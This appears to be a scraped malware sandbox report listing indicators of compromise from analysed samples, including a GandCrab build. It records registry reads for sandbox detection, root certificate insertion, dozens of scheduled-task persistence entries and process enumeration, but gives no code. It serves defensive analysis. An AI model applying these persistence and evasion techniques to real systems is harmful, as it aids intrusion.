e172d0375c8cd5e58929b7d235d389bbfeb5387488083c5b86c943d0b65.exenet1.exe172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe7f1630df6b57af024a3b561bdadc208f.exesvhost.exenet.exe172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exemountvol.exe938b92958ded4d50a357d22eddf141ad.exekosomk.execmd.exenet.exe172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exeCat.exevirus.jk.exe172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exenet1.exe172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe70e28b4e87181b012f43790f1cc8ccf79aae6d2e3ce66dd1659e8098e6c081c2.exe75c82fd18fcf8a51bc1b32a89852d90978fa5e7a55281f42b0a1de98d14644fa.exewinhlp32.exePowershell.exewermgr.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2f1cc715d0e5d4e9142be74287e75887ec207a6bc006c0617eef653fae74647c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language クラック.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Darkest Dungeon setub.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language evil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Gandcrab5.0.3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language server.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 34b0a29a97d72d74cbcf11b5b19c2324a9bbd58dd76a5e87976744414ad47219.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wowmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BTZ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language evil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cbgsujmwws.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dicsord.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language winhlp32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vbc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language see7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 31cd1e172d0375c8cd5e58929b7d235d389bbfeb5387488083c5b86c943d0b65.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7f1630df6b57af024a3b561bdadc208f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mountvol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 938b92958ded4d50a357d22eddf141ad.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language kosomk.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Cat.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language virus.jk.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 70e28b4e87181b012f43790f1cc8ccf79aae6d2e3ce66dd1659e8098e6c081c2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 75c82fd18fcf8a51bc1b32a89852d90978fa5e7a55281f42b0a1de98d14644fa.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language winhlp32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wermgr.exe -
Checks processor information in registry 2 TTPs 5 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
wermgr.exe78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wermgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wermgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier wermgr.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 2788 timeout.exe -
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 1728 taskkill.exe -
Modifies data under HKEY_USERS 1 IoCs
Processes:
lsass.exedescription ioc process Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 lsass.exe -
Modifies registry class 18 IoCs
Processes:
938b92958ded4d50a357d22eddf141ad.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Search.EmbeddedGatherNotify.2\3 938b92958ded4d50a357d22eddf141ad.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Search.EmbeddedGatherNotify.2\CLSID\ = "{9E175B6E-F52A-11D8-B9A5-505054503030}" 938b92958ded4d50a357d22eddf141ad.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Search.EmbeddedGatherNotify.2\PRC = "0" 938b92958ded4d50a357d22eddf141ad.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Search.EmbeddedGatherNotify.2\1 938b92958ded4d50a357d22eddf141ad.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Search.EmbeddedGatherNotify.2\test = "0" 938b92958ded4d50a357d22eddf141ad.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Search.EmbeddedGatherNotify.2 938b92958ded4d50a357d22eddf141ad.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Search.EmbeddedGatherNotify.2\ = "Microsoft Embedded Search Gatherer Notification" 938b92958ded4d50a357d22eddf141ad.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Search.EmbeddedGatherNotify.2\2 938b92958ded4d50a357d22eddf141ad.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Search.EmbeddedGatherNotify.2\prot_test = "1" 938b92958ded4d50a357d22eddf141ad.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Search.EmbeddedGatherNotify.2\1\bin = 17143f56060656185e21461a071807120c1342271e08521b60116c5f537a5800421379 938b92958ded4d50a357d22eddf141ad.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Search.EmbeddedGatherNotify.2\CLSID 938b92958ded4d50a357d22eddf141ad.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Search.EmbeddedGatherNotify.2\PRM = "0" 938b92958ded4d50a357d22eddf141ad.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Search.EmbeddedGatherNotify.2\MIGRATE = "0" 938b92958ded4d50a357d22eddf141ad.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Search.EmbeddedGatherNotify.2\2\bin = 17133a445b065703512f5944120d0b114d16186b060a065028523d5f5a731e5b1f512708195e4a175655497d194743 938b92958ded4d50a357d22eddf141ad.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Search.EmbeddedGatherNotify.2\3\bin = 17173843051a461e0333590106440d0d0e5143625743521269067e565365 938b92958ded4d50a357d22eddf141ad.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Search.EmbeddedGatherNotify.2\L = "500" 938b92958ded4d50a357d22eddf141ad.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Search.EmbeddedGatherNotify.2\Http = "1" 938b92958ded4d50a357d22eddf141ad.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Search.EmbeddedGatherNotify.2\PRS = "0" 938b92958ded4d50a357d22eddf141ad.exe -
Processes:
78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe -
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 64 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 2676 schtasks.exe 3692 schtasks.exe 3264 schtasks.exe 1992 schtasks.exe 1684 schtasks.exe 2196 schtasks.exe 3816 schtasks.exe 2128 schtasks.exe 908 schtasks.exe 3300 schtasks.exe 3452 schtasks.exe 1988 schtasks.exe 3004 schtasks.exe 1712 schtasks.exe 2588 schtasks.exe 3104 schtasks.exe 1856 schtasks.exe 1644 schtasks.exe 1516 schtasks.exe 1740 schtasks.exe 2416 schtasks.exe 2212 schtasks.exe 2132 schtasks.exe 2920 schtasks.exe 2580 schtasks.exe 1892 schtasks.exe 1924 schtasks.exe 2956 schtasks.exe 1732 schtasks.exe 3196 schtasks.exe 3468 schtasks.exe 904 schtasks.exe 3216 schtasks.exe 2232 schtasks.exe 1532 schtasks.exe 376 schtasks.exe 2088 schtasks.exe 924 schtasks.exe 3416 schtasks.exe 1624 schtasks.exe 1608 schtasks.exe 1936 schtasks.exe 2024 schtasks.exe 3692 schtasks.exe 2352 schtasks.exe 1660 schtasks.exe 2352 schtasks.exe 3316 schtasks.exe 1752 schtasks.exe 2908 schtasks.exe 3260 schtasks.exe 1728 schtasks.exe 3284 schtasks.exe 2360 schtasks.exe 1620 schtasks.exe 1048 schtasks.exe 956 schtasks.exe 1944 schtasks.exe 2408 schtasks.exe 2380 schtasks.exe 4020 schtasks.exe 3548 schtasks.exe 2656 schtasks.exe 804 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
Powershell.exe73c1c41b9e71c48e752a5cd19fe808b6.exe5e710462c65fe899466e4fb7c1e33c9a.exea6a1abaf12a28ea8f6553356c3bdcf57.exe57ccb6f0bd910fed428761828ae93553.exepid process 2304 Powershell.exe 2564 73c1c41b9e71c48e752a5cd19fe808b6.exe 2520 5e710462c65fe899466e4fb7c1e33c9a.exe 2936 a6a1abaf12a28ea8f6553356c3bdcf57.exe 2596 57ccb6f0bd910fed428761828ae93553.exe 2936 a6a1abaf12a28ea8f6553356c3bdcf57.exe 2936 a6a1abaf12a28ea8f6553356c3bdcf57.exe 2936 a6a1abaf12a28ea8f6553356c3bdcf57.exe 2596 57ccb6f0bd910fed428761828ae93553.exe 2596 57ccb6f0bd910fed428761828ae93553.exe 2596 57ccb6f0bd910fed428761828ae93553.exe 2596 57ccb6f0bd910fed428761828ae93553.exe 2596 57ccb6f0bd910fed428761828ae93553.exe 2596 57ccb6f0bd910fed428761828ae93553.exe 2596 57ccb6f0bd910fed428761828ae93553.exe 2596 57ccb6f0bd910fed428761828ae93553.exe 2596 57ccb6f0bd910fed428761828ae93553.exe 2596 57ccb6f0bd910fed428761828ae93553.exe 2596 57ccb6f0bd910fed428761828ae93553.exe 2596 57ccb6f0bd910fed428761828ae93553.exe 2596 57ccb6f0bd910fed428761828ae93553.exe 2596 57ccb6f0bd910fed428761828ae93553.exe 2596 57ccb6f0bd910fed428761828ae93553.exe 2596 57ccb6f0bd910fed428761828ae93553.exe 2596 57ccb6f0bd910fed428761828ae93553.exe 2596 57ccb6f0bd910fed428761828ae93553.exe 2596 57ccb6f0bd910fed428761828ae93553.exe 2596 57ccb6f0bd910fed428761828ae93553.exe 2596 57ccb6f0bd910fed428761828ae93553.exe 2596 57ccb6f0bd910fed428761828ae93553.exe 2596 57ccb6f0bd910fed428761828ae93553.exe 2596 57ccb6f0bd910fed428761828ae93553.exe 2596 57ccb6f0bd910fed428761828ae93553.exe 2596 57ccb6f0bd910fed428761828ae93553.exe 2596 57ccb6f0bd910fed428761828ae93553.exe 2596 57ccb6f0bd910fed428761828ae93553.exe 2596 57ccb6f0bd910fed428761828ae93553.exe 2596 57ccb6f0bd910fed428761828ae93553.exe 2596 57ccb6f0bd910fed428761828ae93553.exe 2596 57ccb6f0bd910fed428761828ae93553.exe 2596 57ccb6f0bd910fed428761828ae93553.exe 2596 57ccb6f0bd910fed428761828ae93553.exe 2596 57ccb6f0bd910fed428761828ae93553.exe 2596 57ccb6f0bd910fed428761828ae93553.exe 2596 57ccb6f0bd910fed428761828ae93553.exe 2596 57ccb6f0bd910fed428761828ae93553.exe 2596 57ccb6f0bd910fed428761828ae93553.exe 2596 57ccb6f0bd910fed428761828ae93553.exe 2596 57ccb6f0bd910fed428761828ae93553.exe 2596 57ccb6f0bd910fed428761828ae93553.exe 2596 57ccb6f0bd910fed428761828ae93553.exe 2596 57ccb6f0bd910fed428761828ae93553.exe 2596 57ccb6f0bd910fed428761828ae93553.exe 2596 57ccb6f0bd910fed428761828ae93553.exe 2596 57ccb6f0bd910fed428761828ae93553.exe 2596 57ccb6f0bd910fed428761828ae93553.exe 2596 57ccb6f0bd910fed428761828ae93553.exe 2596 57ccb6f0bd910fed428761828ae93553.exe 2596 57ccb6f0bd910fed428761828ae93553.exe 2596 57ccb6f0bd910fed428761828ae93553.exe 2596 57ccb6f0bd910fed428761828ae93553.exe 2596 57ccb6f0bd910fed428761828ae93553.exe 2596 57ccb6f0bd910fed428761828ae93553.exe 2596 57ccb6f0bd910fed428761828ae93553.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
Processes:
34b0a29a97d72d74cbcf11b5b19c2324a9bbd58dd76a5e87976744414ad47219.exeserver.exepid process 2784 34b0a29a97d72d74cbcf11b5b19c2324a9bbd58dd76a5e87976744414ad47219.exe 3748 server.exe -
Suspicious behavior: LoadsDriver 3 IoCs
Processes:
pid process 476 476 476 -
Suspicious behavior: MapViewOfSection 19 IoCs
Processes:
